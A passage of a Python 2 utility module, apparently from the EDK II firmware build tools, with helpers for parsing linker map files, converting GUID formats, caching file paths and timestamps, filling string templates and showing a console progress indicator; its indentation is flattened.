# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
##
# Import Modules
#
import Common.LongFilePathOs as os
import sys
import string
import thread
import threading
import time
import re
import cPickle
import array
import shutil
from struct import pack
from UserDict import IterableUserDict
from UserList import UserList
from Common import EdkLogger as EdkLogger
from Common import GlobalData as GlobalData
from DataType import *
from BuildToolError import *
from CommonDataClass.DataClass import *
from Parsing import GetSplitValueList
from Common.LongFilePathSupport import OpenLongFilePath as open
from Common.MultipleWorkspace import MultipleWorkspace as mws
import uuid
from CommonDataClass.Exceptions import BadExpression
## Regular expression used to find out place holders in string template
gPlaceholderPattern = re.compile("\$\{([^$()\s]+)\}", re.MULTILINE | re.UNICODE)
## Dictionary used to store file time stamp for quick re-access
gFileTimeStampCache = {} # {file path : file time stamp}
## Dictionary used to store dependencies of files
gDependencyDatabase = {} # arch : {file path : [dependent files list]}
def GetVariableOffset(mapfilepath, efifilepath, varnames):
""" Parse map file to get variable offset in current EFI file
@param mapfilepath Map file absolution path
@param efifilepath: EFI binary file full path
@param varnames iteratable container whose elements are variable names to be searched
@return List whos elements are tuple with variable name and raw offset
"""
lines = []
try:
f = open(mapfilepath, 'r')
lines = f.readlines()
f.close()
except:
return None
if len(lines) == 0: return None
firstline = lines[0].strip()
if (firstline.startswith("Archive member included ") and
firstline.endswith(" file (symbol)")):
return _parseForGCC(lines, efifilepath, varnames)
if firstline.startswith("# Path:"):
return _parseForXcode(lines, efifilepath, varnames)
return _parseGeneral(lines, efifilepath, varnames)
def _parseForXcode(lines, efifilepath, varnames):
status = 0
ret = []
for index, line in enumerate(lines):
line = line.strip()
if status == 0 and line == "# Symbols:":
status = 1
continue
if status == 1 and len(line) != 0:
for varname in varnames:
if varname in line:
m = re.match('^([\da-fA-FxX]+)([\s\S]*)([_]*%s)$' % varname, line)
if m != None:
ret.append((varname, m.group(1)))
return ret
def _parseForGCC(lines, efifilepath, varnames):
""" Parse map file generated by GCC linker """
status = 0
sections = []
varoffset = []
for index, line in enumerate(lines):
line = line.strip()
# status machine transection
if status == 0 and line == "Memory Configuration":
status = 1
continue
elif status == 1 and line == 'Linker script and memory map':
status = 2
continue
elif status ==2 and line == 'START GROUP':
status = 3
continue
# status handler
if status == 3:
m = re.match('^([\w_\.]+) +([\da-fA-Fx]+) +([\da-fA-Fx]+)$', line)
if m != None:
sections.append(m.groups(0))
for varname in varnames:
Str = ''
m = re.match("^.data.(%s)" % varname, line)
if m != None:
m = re.match(".data.(%s)$" % varname, line)
if m != None:
Str = lines[index + 1]
else:
Str = line[len(".data.%s" % varname):]
if Str:
m = re.match('^([\da-fA-Fx]+) +([\da-fA-Fx]+)', Str.strip())
if m != None:
varoffset.append((varname, int(m.groups(0)[0], 16) , int(sections[-1][1], 16), sections[-1][0]))
if not varoffset:
return []
# get section information from efi file
efisecs = PeImageClass(efifilepath).SectionHeaderList
if efisecs == None or len(efisecs) == 0:
return []
#redirection
redirection = 0
for efisec in efisecs:
for section in sections:
if section[0].strip() == efisec[0].strip() and section[0].strip() == '.text':
redirection = int(section[1], 16) - efisec[1]
ret = []
for var in varoffset:
for efisec in efisecs:
if var[1] >= efisec[1] and var[1] < efisec[1]+efisec[3]:
ret.append((var[0], hex(efisec[2] + var[1] - efisec[1] - redirection)))
return ret
def _parseGeneral(lines, efifilepath, varnames):
status = 0 #0 - beginning of file; 1 - PE section definition; 2 - symbol table
secs = [] # key = section name
varoffset = []
secRe = re.compile('^([\da-fA-F]+):([\da-fA-F]+) +([\da-fA-F]+)[Hh]? +([.\w\$]+) +(\w+)', re.UNICODE)
symRe = re.compile('^([\da-fA-F]+):([\da-fA-F]+) +([\.:\\\\\w\?@\$]+) +([\da-fA-F]+)', re.UNICODE)
for line in lines:
line = line.strip()
if re.match("^Start[' ']+Length[' ']+Name[' ']+Class", line):
status = 1
continue
if re.match("^Address[' ']+Publics by Value[' ']+Rva\+Base", line):
status = 2
continue
if re.match("^entry point at", line):
status = 3
continue
if status == 1 and len(line) != 0:
m = secRe.match(line)
assert m != None, "Fail to parse the section in map file , line is %s" % line
sec_no, sec_start, sec_length, sec_name, sec_class = m.groups(0)
secs.append([int(sec_no, 16), int(sec_start, 16), int(sec_length, 16), sec_name, sec_class])
if status == 2 and len(line) != 0:
for varname in varnames:
m = symRe.match(line)
assert m != None, "Fail to parse the symbol in map file, line is %s" % line
sec_no, sym_offset, sym_name, vir_addr = m.groups(0)
sec_no = int(sec_no, 16)
sym_offset = int(sym_offset, 16)
vir_addr = int(vir_addr, 16)
m2 = re.match('^[_]*(%s)' % varname, sym_name)
if m2 != None:
# fond a binary pcd entry in map file
for sec in secs:
if sec[0] == sec_no and (sym_offset >= sec[1] and sym_offset < sec[1] + sec[2]):
varoffset.append([varname, sec[3], sym_offset, vir_addr, sec_no])
if not varoffset: return []
# get section information from efi file
efisecs = PeImageClass(efifilepath).SectionHeaderList
if efisecs == None or len(efisecs) == 0:
return []
ret = []
for var in varoffset:
index = 0
for efisec in efisecs:
index = index + 1
if var[1].strip() == efisec[0].strip():
ret.append((var[0], hex(efisec[2] + var[2])))
elif var[4] == index:
ret.append((var[0], hex(efisec[2] + var[2])))
return ret
## Routine to process duplicated INF
#
# This function is called by following two cases:
# Case 1 in DSC:
# [components.arch]
# Pkg/module/module.inf
# Pkg/module/module.inf {
# <Defines>
# FILE_GUID = 0D1B936F-68F3-4589-AFCC-FB8B7AEBC836
# }
# Case 2 in FDF:
# INF Pkg/module/module.inf
# INF FILE_GUID = 0D1B936F-68F3-4589-AFCC-FB8B7AEBC836 Pkg/module/module.inf
#
# This function copies Pkg/module/module.inf to
# Conf/.cache/0D1B936F-68F3-4589-AFCC-FB8B7AEBC836module.inf
#
# @param Path Original PathClass object
# @param BaseName New file base name
#
# @retval return the new PathClass object
#
def ProcessDuplicatedInf(Path, BaseName, Workspace):
Filename = os.path.split(Path.File)[1]
if '.' in Filename:
Filename = BaseName + Path.BaseName + Filename[Filename.rfind('.'):]
else:
Filename = BaseName + Path.BaseName
#
# If -N is specified on command line, cache is disabled
# The directory has to be created
#
DbDir = os.path.split(GlobalData.gDatabasePath)[0]
if not os.path.exists(DbDir):
os.makedirs(DbDir)
#
# A temporary INF is copied to database path which must have write permission
# The temporary will be removed at the end of build
# In case of name conflict, the file name is
# FILE_GUIDBaseName (0D1B936F-68F3-4589-AFCC-FB8B7AEBC836module.inf)
#
TempFullPath = os.path.join(DbDir,
Filename)
RtPath = PathClass(Path.File, Workspace)
#
# Modify the full path to temporary path, keep other unchanged
#
# To build same module more than once, the module path with FILE_GUID overridden has
# the file name FILE_GUIDmodule.inf, but the relative path (self.MetaFile.File) is the real path
# in DSC which is used as relative path by C files and other files in INF.
# A trick was used: all module paths are PathClass instances, after the initialization
# of PathClass, the PathClass.Path is overridden by the temporary INF path.
#
# The reason for creating a temporary INF is:
# Platform.Modules which is the base to create ModuleAutoGen objects is a dictionary,
# the key is the full path of INF, the value is an object to save overridden library instances, PCDs.
# A different key for the same module is needed to create different output directory,
# retrieve overridden PCDs, library instances.
#
# The BaseName is the FILE_GUID which is also the output directory name.
#
#
RtPath.Path = TempFullPath
RtPath.BaseName = BaseName
#
# If file exists, compare contents
#
if os.path.exists(TempFullPath):
with open(str(Path), 'rb') as f1: Src = f1.read()
with open(TempFullPath, 'rb') as f2: Dst = f2.read()
if Src == Dst:
return RtPath
GlobalData.gTempInfs.append(TempFullPath)
shutil.copy2(str(Path), TempFullPath)
return RtPath
## Remove temporary created INFs whose paths were saved in gTempInfs
#
def ClearDuplicatedInf():
for File in GlobalData.gTempInfs:
if os.path.exists(File):
os.remove(File)
## callback routine for processing variable option
#
# This function can be used to process variable number of option values. The
# typical usage of it is specify architecure list on command line.
# (e.g. <tool> -a IA32 X64 IPF)
#
# @param Option Standard callback function parameter
# @param OptionString Standard callback function parameter
# @param Value Standard callback function parameter
# @param Parser Standard callback function parameter
#
# @retval
#
def ProcessVariableArgument(Option, OptionString, Value, Parser):
assert Value is None
Value = []
RawArgs = Parser.rargs
while RawArgs:
Arg = RawArgs[0]
if (Arg[:2] == "--" and len(Arg) > 2) or \
(Arg[:1] == "-" and len(Arg) > 1 and Arg[1] != "-"):
break
Value.append(Arg)
del RawArgs[0]
setattr(Parser.values, Option.dest, Value)
## Convert GUID string in xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx style to C structure style
#
# @param Guid The GUID string
#
# @retval string The GUID string in C structure style
#
def GuidStringToGuidStructureString(Guid):
GuidList = Guid.split('-')
Result = '{'
for Index in range(0, 3, 1):
Result = Result + '0x' + GuidList[Index] + ', '
Result = Result + '{0x' + GuidList[3][0:2] + ', 0x' + GuidList[3][2:4]
for Index in range(0, 12, 2):
Result = Result + ', 0x' + GuidList[4][Index:Index + 2]
Result += '}}'
return Result
## Convert GUID structure in byte array to xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
#
# @param GuidValue The GUID value in byte array
#
# @retval string The GUID value in xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx format
#
def GuidStructureByteArrayToGuidString(GuidValue):
guidValueString = GuidValue.lower().replace("{", "").replace("}", "").replace(" ", "").replace(";", "")
guidValueList = guidValueString.split(",")
if len(guidValueList) != 16:
return ''
#EdkLogger.error(None, None, "Invalid GUID value string %s" % GuidValue)
try:
return "%02x%02x%02x%02x-%02x%02x-%02x%02x-%02x%02x-%02x%02x%02x%02x%02x%02x" % (
int(guidValueList[3], 16),
int(guidValueList[2], 16),
int(guidValueList[1], 16),
int(guidValueList[0], 16),
int(guidValueList[5], 16),
int(guidValueList[4], 16),
int(guidValueList[7], 16),
int(guidValueList[6], 16),
int(guidValueList[8], 16),
int(guidValueList[9], 16),
int(guidValueList[10], 16),
int(guidValueList[11], 16),
int(guidValueList[12], 16),
int(guidValueList[13], 16),
int(guidValueList[14], 16),
int(guidValueList[15], 16)
)
except:
return ''
## Convert GUID string in C structure style to xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
#
# @param GuidValue The GUID value in C structure format
#
# @retval string The GUID value in xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx format
#
def GuidStructureStringToGuidString(GuidValue):
guidValueString = GuidValue.lower().replace("{", "").replace("}", "").replace(" ", "").replace(";", "")
guidValueList = guidValueString.split(",")
if len(guidValueList) != 11:
return ''
#EdkLogger.error(None, None, "Invalid GUID value string %s" % GuidValue)
try:
return "%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x" % (
int(guidValueList[0], 16),
int(guidValueList[1], 16),
int(guidValueList[2], 16),
int(guidValueList[3], 16),
int(guidValueList[4], 16),
int(guidValueList[5], 16),
int(guidValueList[6], 16),
int(guidValueList[7], 16),
int(guidValueList[8], 16),
int(guidValueList[9], 16),
int(guidValueList[10], 16)
)
except:
return ''
## Convert GUID string in C structure style to xxxxxxxx_xxxx_xxxx_xxxx_xxxxxxxxxxxx
#
# @param GuidValue The GUID value in C structure format
#
# @retval string The GUID value in xxxxxxxx_xxxx_xxxx_xxxx_xxxxxxxxxxxx format
#
def GuidStructureStringToGuidValueName(GuidValue):
guidValueString = GuidValue.lower().replace("{", "").replace("}", "").replace(" ", "")
guidValueList = guidValueString.split(",")
if len(guidValueList) != 11:
EdkLogger.error(None, FORMAT_INVALID, "Invalid GUID value string [%s]" % GuidValue)
return "%08x_%04x_%04x_%02x%02x_%02x%02x%02x%02x%02x%02x" % (
int(guidValueList[0], 16),
int(guidValueList[1], 16),
int(guidValueList[2], 16),
int(guidValueList[3], 16),
int(guidValueList[4], 16),
int(guidValueList[5], 16),
int(guidValueList[6], 16),
int(guidValueList[7], 16),
int(guidValueList[8], 16),
int(guidValueList[9], 16),
int(guidValueList[10], 16)
)
## Create directories
#
# @param Directory The directory name
#
def CreateDirectory(Directory):
if Directory == None or Directory.strip() == "":
return True
try:
if not os.access(Directory, os.F_OK):
os.makedirs(Directory)
except:
return False
return True
## Remove directories, including files and sub-directories in it
#
# @param Directory The directory name
#
def RemoveDirectory(Directory, Recursively=False):
if Directory == None or Directory.strip() == "" or not os.path.exists(Directory):
return
if Recursively:
CurrentDirectory = os.getcwd()
os.chdir(Directory)
for File in os.listdir("."):
if os.path.isdir(File):
RemoveDirectory(File, Recursively)
else:
os.remove(File)
os.chdir(CurrentDirectory)
os.rmdir(Directory)
## Check if given file is changed or not
#
# This method is used to check if a file is changed or not between two build
# actions. It makes use a cache to store files timestamp.
#
# @param File The path of file
#
# @retval True If the given file is changed, doesn't exist, or can't be
# found in timestamp cache
# @retval False If the given file is changed
#
def IsChanged(File):
if not os.path.exists(File):
return True
FileState = os.stat(File)
TimeStamp = FileState[-2]
if File in gFileTimeStampCache and TimeStamp == gFileTimeStampCache[File]:
FileChanged = False
else:
FileChanged = True
gFileTimeStampCache[File] = TimeStamp
return FileChanged
## Store content in file
#
# This method is used to save file only when its content is changed. This is
# quite useful for "make" system to decide what will be re-built and what won't.
#
# @param File The path of file
# @param Content The new content of the file
# @param IsBinaryFile The flag indicating if the file is binary file or not
#
# @retval True If the file content is changed and the file is renewed
# @retval False If the file content is the same
#
def SaveFileOnChange(File, Content, IsBinaryFile=True):
if not IsBinaryFile:
Content = Content.replace("\n", os.linesep)
if os.path.exists(File):
try:
if Content == open(File, "rb").read():
return False
except:
EdkLogger.error(None, FILE_OPEN_FAILURE, ExtraData=File)
DirName = os.path.dirname(File)
if not CreateDirectory(DirName):
EdkLogger.error(None, FILE_CREATE_FAILURE, "Could not create directory %s" % DirName)
else:
if DirName == '':
DirName = os.getcwd()
if not os.access(DirName, os.W_OK):
EdkLogger.error(None, PERMISSION_FAILURE, "Do not have write permission on directory %s" % DirName)
try:
if GlobalData.gIsWindows:
try:
from PyUtility import SaveFileToDisk
if not SaveFileToDisk(File, Content):
EdkLogger.error(None, FILE_CREATE_FAILURE, ExtraData=File)
except:
Fd = open(File, "wb")
Fd.write(Content)
Fd.close()
else:
Fd = open(File, "wb")
Fd.write(Content)
Fd.close()
except IOError, X:
EdkLogger.error(None, FILE_CREATE_FAILURE, ExtraData='IOError %s' % X)
return True
## Make a Python object persistent on file system
#
# @param Data The object to be stored in file
# @param File The path of file to store the object
#
def DataDump(Data, File):
Fd = None
try:
Fd = open(File, 'wb')
cPickle.dump(Data, Fd, cPickle.HIGHEST_PROTOCOL)
except:
EdkLogger.error("", FILE_OPEN_FAILURE, ExtraData=File, RaiseError=False)
finally:
if Fd != None:
Fd.close()
## Restore a Python object from a file
#
# @param File The path of file stored the object
#
# @retval object A python object
# @retval None If failure in file operation
#
def DataRestore(File):
Data = None
Fd = None
try:
Fd = open(File, 'rb')
Data = cPickle.load(Fd)
except Exception, e:
EdkLogger.verbose("Failed to load [%s]\n\t%s" % (File, str(e)))
Data = None
finally:
if Fd != None:
Fd.close()
return Data
## Retrieve and cache the real path name in file system
#
# @param Root The root directory of path relative to
#
# @retval str The path string if the path exists
# @retval None If path doesn't exist
#
class DirCache:
_CACHE_ = set()
_UPPER_CACHE_ = {}
def __init__(self, Root):
self._Root = Root
for F in os.listdir(Root):
self._CACHE_.add(F)
self._UPPER_CACHE_[F.upper()] = F
# =[] operator
def __getitem__(self, Path):
Path = Path[len(os.path.commonprefix([Path, self._Root])):]
if not Path:
return self._Root
if Path and Path[0] == os.path.sep:
Path = Path[1:]
if Path in self._CACHE_:
return os.path.join(self._Root, Path)
UpperPath = Path.upper()
if UpperPath in self._UPPER_CACHE_:
return os.path.join(self._Root, self._UPPER_CACHE_[UpperPath])
IndexList = []
LastSepIndex = -1
SepIndex = Path.find(os.path.sep)
while SepIndex > -1:
Parent = UpperPath[:SepIndex]
if Parent not in self._UPPER_CACHE_:
break
LastSepIndex = SepIndex
SepIndex = Path.find(os.path.sep, LastSepIndex + 1)
if LastSepIndex == -1:
return None
Cwd = os.getcwd()
os.chdir(self._Root)
SepIndex = LastSepIndex
while SepIndex > -1:
Parent = Path[:SepIndex]
ParentKey = UpperPath[:SepIndex]
if ParentKey not in self._UPPER_CACHE_:
os.chdir(Cwd)
return None
if Parent in self._CACHE_:
ParentDir = Parent
else:
ParentDir = self._UPPER_CACHE_[ParentKey]
for F in os.listdir(ParentDir):
Dir = os.path.join(ParentDir, F)
self._CACHE_.add(Dir)
self._UPPER_CACHE_[Dir.upper()] = Dir
SepIndex = Path.find(os.path.sep, SepIndex + 1)
os.chdir(Cwd)
if Path in self._CACHE_:
return os.path.join(self._Root, Path)
elif UpperPath in self._UPPER_CACHE_:
return os.path.join(self._Root, self._UPPER_CACHE_[UpperPath])
return None
## Get all files of a directory
#
# @param Root: Root dir
# @param SkipList : The files need be skipped
#
# @retval A list of all files
#
def GetFiles(Root, SkipList=None, FullPath=True):
OriPath = Root
FileList = []
for Root, Dirs, Files in os.walk(Root):
if SkipList:
for Item in SkipList:
if Item in Dirs:
Dirs.remove(Item)
for File in Files:
File = os.path.normpath(os.path.join(Root, File))
if not FullPath:
File = File[len(OriPath) + 1:]
FileList.append(File)
return FileList
## Check if gvien file exists or not
#
# @param File File name or path to be checked
# @param Dir The directory the file is relative to
#
# @retval True if file exists
# @retval False if file doesn't exists
#
def ValidFile(File, Ext=None):
if Ext != None:
Dummy, FileExt = os.path.splitext(File)
if FileExt.lower() != Ext.lower():
return False
if not os.path.exists(File):
return False
return True
def RealPath(File, Dir='', OverrideDir=''):
NewFile = os.path.normpath(os.path.join(Dir, File))
NewFile = GlobalData.gAllFiles[NewFile]
if not NewFile and OverrideDir:
NewFile = os.path.normpath(os.path.join(OverrideDir, File))
NewFile = GlobalData.gAllFiles[NewFile]
return NewFile
def RealPath2(File, Dir='', OverrideDir=''):
NewFile = None
if OverrideDir:
NewFile = GlobalData.gAllFiles[os.path.normpath(os.path.join(OverrideDir, File))]
if NewFile:
if OverrideDir[-1] == os.path.sep:
return NewFile[len(OverrideDir):], NewFile[0:len(OverrideDir)]
else:
return NewFile[len(OverrideDir) + 1:], NewFile[0:len(OverrideDir)]
if GlobalData.gAllFiles:
NewFile = GlobalData.gAllFiles[os.path.normpath(os.path.join(Dir, File))]
if not NewFile:
NewFile = os.path.normpath(os.path.join(Dir, File))
if not os.path.exists(NewFile):
return None, None
if NewFile:
if Dir:
if Dir[-1] == os.path.sep:
return NewFile[len(Dir):], NewFile[0:len(Dir)]
else:
return NewFile[len(Dir) + 1:], NewFile[0:len(Dir)]
else:
return NewFile, ''
return None, None
## Check if gvien file exists or not
#
#
def ValidFile2(AllFiles, File, Ext=None, Workspace='', EfiSource='', EdkSource='', Dir='.', OverrideDir=''):
NewFile = File
if Ext != None:
Dummy, FileExt = os.path.splitext(File)
if FileExt.lower() != Ext.lower():
return False, File
# Replace the Edk macros
if OverrideDir != '' and OverrideDir != None:
if OverrideDir.find('$(EFI_SOURCE)') > -1:
OverrideDir = OverrideDir.replace('$(EFI_SOURCE)', EfiSource)
if OverrideDir.find('$(EDK_SOURCE)') > -1:
OverrideDir = OverrideDir.replace('$(EDK_SOURCE)', EdkSource)
# Replace the default dir to current dir
if Dir == '.':
Dir = os.getcwd()
Dir = Dir[len(Workspace) + 1:]
# First check if File has Edk definition itself
if File.find('$(EFI_SOURCE)') > -1 or File.find('$(EDK_SOURCE)') > -1:
NewFile = File.replace('$(EFI_SOURCE)', EfiSource)
NewFile = NewFile.replace('$(EDK_SOURCE)', EdkSource)
NewFile = AllFiles[os.path.normpath(NewFile)]
if NewFile != None:
return True, NewFile
# Second check the path with override value
if OverrideDir != '' and OverrideDir != None:
NewFile = AllFiles[os.path.normpath(os.path.join(OverrideDir, File))]
if NewFile != None:
return True, NewFile
# Last check the path with normal definitions
File = os.path.join(Dir, File)
NewFile = AllFiles[os.path.normpath(File)]
if NewFile != None:
return True, NewFile
return False, File
## Check if gvien file exists or not
#
#
def ValidFile3(AllFiles, File, Workspace='', EfiSource='', EdkSource='', Dir='.', OverrideDir=''):
# Replace the Edk macros
if OverrideDir != '' and OverrideDir != None:
if OverrideDir.find('$(EFI_SOURCE)') > -1:
OverrideDir = OverrideDir.replace('$(EFI_SOURCE)', EfiSource)
if OverrideDir.find('$(EDK_SOURCE)') > -1:
OverrideDir = OverrideDir.replace('$(EDK_SOURCE)', EdkSource)
# Replace the default dir to current dir
# Dir is current module dir related to workspace
if Dir == '.':
Dir = os.getcwd()
Dir = Dir[len(Workspace) + 1:]
NewFile = File
RelaPath = AllFiles[os.path.normpath(Dir)]
NewRelaPath = RelaPath
while(True):
# First check if File has Edk definition itself
if File.find('$(EFI_SOURCE)') > -1 or File.find('$(EDK_SOURCE)') > -1:
File = File.replace('$(EFI_SOURCE)', EfiSource)
File = File.replace('$(EDK_SOURCE)', EdkSource)
NewFile = AllFiles[os.path.normpath(File)]
if NewFile != None:
NewRelaPath = os.path.dirname(NewFile)
File = os.path.basename(NewFile)
#NewRelaPath = NewFile[:len(NewFile) - len(File.replace("..\\", '').replace("../", '')) - 1]
break
# Second check the path with override value
if OverrideDir != '' and OverrideDir != None:
NewFile = AllFiles[os.path.normpath(os.path.join(OverrideDir, File))]
if NewFile != None:
#NewRelaPath = os.path.dirname(NewFile)
NewRelaPath = NewFile[:len(NewFile) - len(File.replace("..\\", '').replace("../", '')) - 1]
break
# Last check the path with normal definitions
NewFile = AllFiles[os.path.normpath(os.path.join(Dir, File))]
if NewFile != None:
break
# No file found
break
return NewRelaPath, RelaPath, File
def GetRelPath(Path1, Path2):
FileName = os.path.basename(Path2)
L1 = os.path.normpath(Path1).split(os.path.normpath('/'))
L2 = os.path.normpath(Path2).split(os.path.normpath('/'))
for Index in range(0, len(L1)):
if L1[Index] != L2[Index]:
FileName = '../' * (len(L1) - Index)
for Index2 in range(Index, len(L2)):
FileName = os.path.join(FileName, L2[Index2])
break
return os.path.normpath(FileName)
## Get GUID value from given packages
#
# @param CName The CName of the GUID
# @param PackageList List of packages looking-up in
# @param Inffile The driver file
#
# @retval GuidValue if the CName is found in any given package
# @retval None if the CName is not found in all given packages
#
def GuidValue(CName, PackageList, Inffile = None):
for P in PackageList:
GuidKeys = P.Guids.keys()
if Inffile and P._PrivateGuids:
if not Inffile.startswith(P.MetaFile.Dir):
GuidKeys = (dict.fromkeys(x for x in P.Guids if x not in P._PrivateGuids)).keys()
if CName in GuidKeys:
return P.Guids[CName]
return None
## Get Protocol value from given packages
#
# @param CName The CName of the GUID
# @param PackageList List of packages looking-up in
# @param Inffile The driver file
#
# @retval GuidValue if the CName is found in any given package
# @retval None if the CName is not found in all given packages
#
def ProtocolValue(CName, PackageList, Inffile = None):
for P in PackageList:
ProtocolKeys = P.Protocols.keys()
if Inffile and P._PrivateProtocols:
if not Inffile.startswith(P.MetaFile.Dir):
ProtocolKeys = (dict.fromkeys(x for x in P.Protocols if x not in P._PrivateProtocols)).keys()
if CName in ProtocolKeys:
return P.Protocols[CName]
return None
## Get PPI value from given packages
#
# @param CName The CName of the GUID
# @param PackageList List of packages looking-up in
# @param Inffile The driver file
#
# @retval GuidValue if the CName is found in any given package
# @retval None if the CName is not found in all given packages
#
def PpiValue(CName, PackageList, Inffile = None):
for P in PackageList:
PpiKeys = P.Ppis.keys()
if Inffile and P._PrivatePpis:
if not Inffile.startswith(P.MetaFile.Dir):
PpiKeys = (dict.fromkeys(x for x in P.Ppis if x not in P._PrivatePpis)).keys()
if CName in PpiKeys:
return P.Ppis[CName]
return None
## A string template class
#
# This class implements a template for string replacement. A string template
# looks like following
#
# ${BEGIN} other_string ${placeholder_name} other_string ${END}
#
# The string between ${BEGIN} and ${END} will be repeated as many times as the
# length of "placeholder_name", which is a list passed through a dict. The
# "placeholder_name" is the key name of the dict. The ${BEGIN} and ${END} can
# be not used and, in this case, the "placeholder_name" must not a list and it
# will just be replaced once.
#
class TemplateString(object):
_REPEAT_START_FLAG = "BEGIN"
_REPEAT_END_FLAG = "END"
class Section(object):
_LIST_TYPES = [type([]), type(set()), type((0,))]
def __init__(self, TemplateSection, PlaceHolderList):
self._Template = TemplateSection
self._PlaceHolderList = []
# Split the section into sub-sections according to the position of placeholders
if PlaceHolderList:
self._SubSectionList = []
SubSectionStart = 0
#
# The placeholders passed in must be in the format of
#
# PlaceHolderName, PlaceHolderStartPoint, PlaceHolderEndPoint
#
for PlaceHolder, Start, End in PlaceHolderList:
self._SubSectionList.append(TemplateSection[SubSectionStart:Start])
self._SubSectionList.append(TemplateSection[Start:End])
self._PlaceHolderList.append(PlaceHolder)
SubSectionStart = End
if SubSectionStart < len(TemplateSection):
self._SubSectionList.append(TemplateSection[SubSectionStart:])
else:
self._SubSectionList = [TemplateSection]
def __str__(self):
return self._Template + " : " + str(self._PlaceHolderList)
def Instantiate(self, PlaceHolderValues):
RepeatTime = -1
RepeatPlaceHolders = {}
NonRepeatPlaceHolders = {}
for PlaceHolder in self._PlaceHolderList:
if PlaceHolder not in PlaceHolderValues:
continue
Value = PlaceHolderValues[PlaceHolder]
if type(Value) in self._LIST_TYPES:
if RepeatTime < 0:
RepeatTime = len(Value)
elif RepeatTime != len(Value):
EdkLogger.error(
"TemplateString",
PARAMETER_INVALID,
"${%s} has different repeat time from others!" % PlaceHolder,
ExtraData=str(self._Template)
)
RepeatPlaceHolders["${%s}" % PlaceHolder] = Value
else:
NonRepeatPlaceHolders["${%s}" % PlaceHolder] = Value
if NonRepeatPlaceHolders:
StringList = []
for S in self._SubSectionList:
if S not in NonRepeatPlaceHolders:
StringList.append(S)
else:
StringList.append(str(NonRepeatPlaceHolders[S]))
else:
StringList = self._SubSectionList
if RepeatPlaceHolders:
TempStringList = []
for Index in range(RepeatTime):
for S in StringList:
if S not in RepeatPlaceHolders:
TempStringList.append(S)
else:
TempStringList.append(str(RepeatPlaceHolders[S][Index]))
StringList = TempStringList
return "".join(StringList)
## Constructor
def __init__(self, Template=None):
self.String = ''
self.IsBinary = False
self._Template = Template
self._TemplateSectionList = self._Parse(Template)
## str() operator
#
# @retval string The string replaced
#
def __str__(self):
return self.String
## Split the template string into fragments per the ${BEGIN} and ${END} flags
#
# @retval list A list of TemplateString.Section objects
#
def _Parse(self, Template):
SectionStart = 0
SearchFrom = 0
MatchEnd = 0
PlaceHolderList = []
TemplateSectionList = []
while Template:
MatchObj = gPlaceholderPattern.search(Template, SearchFrom)
if not MatchObj:
if MatchEnd <= len(Template):
TemplateSection = TemplateString.Section(Template[SectionStart:], PlaceHolderList)
TemplateSectionList.append(TemplateSection)
break
MatchString = MatchObj.group(1)
MatchStart = MatchObj.start()
MatchEnd = MatchObj.end()
if MatchString == self._REPEAT_START_FLAG:
if MatchStart > SectionStart:
TemplateSection = TemplateString.Section(Template[SectionStart:MatchStart], PlaceHolderList)
TemplateSectionList.append(TemplateSection)
SectionStart = MatchEnd
PlaceHolderList = []
elif MatchString == self._REPEAT_END_FLAG:
TemplateSection = TemplateString.Section(Template[SectionStart:MatchStart], PlaceHolderList)
TemplateSectionList.append(TemplateSection)
SectionStart = MatchEnd
PlaceHolderList = []
else:
PlaceHolderList.append((MatchString, MatchStart - SectionStart, MatchEnd - SectionStart))
SearchFrom = MatchEnd
return TemplateSectionList
## Replace the string template with dictionary of placeholders and append it to previous one
#
# @param AppendString The string template to append
# @param Dictionary The placeholder dictionaries
#
def Append(self, AppendString, Dictionary=None):
if Dictionary:
SectionList = self._Parse(AppendString)
self.String += "".join([S.Instantiate(Dictionary) for S in SectionList])
else:
self.String += AppendString
## Replace the string template with dictionary of placeholders
#
# @param Dictionary The placeholder dictionaries
#
# @retval str The string replaced with placeholder values
#
def Replace(self, Dictionary=None):
return "".join([S.Instantiate(Dictionary) for S in self._TemplateSectionList])
## Progress indicator class
#
# This class makes use of thread to print progress on console.
#
class Progressor:
# for avoiding deadloop
_StopFlag = None
_ProgressThread = None
_CheckInterval = 0.25
## Constructor
#
# @param OpenMessage The string printed before progress charaters
# @param CloseMessage The string printed after progress charaters
# @param ProgressChar The charater used to indicate the progress
# @param Interval The interval in seconds between two progress charaters
#
def __init__(self, OpenMessage="", CloseMessage="", ProgressChar='.', Interval=1.0):
self.PromptMessage = OpenMessage
self.CodaMessage = CloseMessage
self.ProgressChar = ProgressChar
self.Interval = Interval
if Progressor._StopFlag == None:
Progressor._StopFlag = threading.Event()
## Start to print progress charater
#
# @param OpenMessage The string printed before progress charaters
#
def Start(self, OpenMessage=None):
if OpenMessage != None:
self.PromptMessage = OpenMessage
Progressor._StopFlag.clear()
if Progressor._ProgressThread == None:
Progressor._ProgressThread = threading.Thread(target=self._ProgressThreadEntry)
Progressor._ProgressThread.setDaemon(False)
Progressor._ProgressThread.start()
## Stop printing progress charater
#
# @param CloseMessage The string printed after progress charaters
#
def Stop(self, CloseMessage=None):
OriginalCodaMessage = self.CodaMessage
if CloseMessage != None:
self.CodaMessage = CloseMessage
self.Abort()
self.CodaMessage = OriginalCodaMessage
## Thread entry method
def _ProgressThreadEntry(self):
sys.stdout.write(self.PromptMessage + " ")
sys.stdout.flush()
TimeUp = 0.0
while not Progressor._StopFlag.isSet():
if TimeUp <= 0.0:
sys.stdout.write(self.ProgressChar)
sys.stdout.flush()
TimeUp = self.Interval
time.sleep(self._CheckInterval)
TimeUp -= self._CheckInterval
sys.stdout.write(" " + self.CodaMessage + "\n")
sys.stdout.flush()
## Abort the progress display
@staticmethod
def Abort():
if Progressor._StopFlag != None:
Progressor._StopFlag.set()
if Progressor._ProgressThread != None:
Progressor._ProgressThread.join()
Progressor._ProgressThread = None
## A dict which can access its keys and/or values orderly
#
# The class implements a new kind of dict which its keys or values can be
# accessed in the order they are added into the dict. It guarantees the order
# by making use of an internal list to keep a copy of keys.
#
class sdict(IterableUserDict):
## Constructor
def __init__(self):
IterableUserDict.__init__(self)
self._key_list = []
## [] operator
def __setitem__(self, key, value):
